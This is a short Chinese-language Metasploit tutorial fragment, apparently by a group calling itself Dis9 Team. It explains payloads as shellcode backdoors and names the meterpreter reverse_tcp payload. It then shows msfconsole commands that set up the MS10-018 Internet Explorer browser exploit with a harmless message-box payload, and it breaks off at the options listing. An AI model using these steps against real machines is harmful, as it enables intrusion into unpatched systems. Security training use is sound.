PAYLOAD是啥子? 就是SHELLCODE,就是METASPLOIT的后门方式,正对WINDOWS LINUX等等都用
最长用的是:
windows/meterpreter/reverse_tcp
我们来换一个,我要他弹窗: Hacked By Dis9 Team
打开UB1 XP2 1
用exploit/windows/browser/ms10_018_ie_behaviors来做演示
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 |
msf > use exploit/windows/browser/ms10_018_ie_behaviors msf exploit(ms10_018_ie_behaviors) > set PAYLOAD windows/messagebox PAYLOAD => windows/messagebox msf exploit(ms10_018_ie_behaviors) > show options Module options (exploit/windows/browser/ms10_018_ie_behaviors): Name Current Setting Required Description |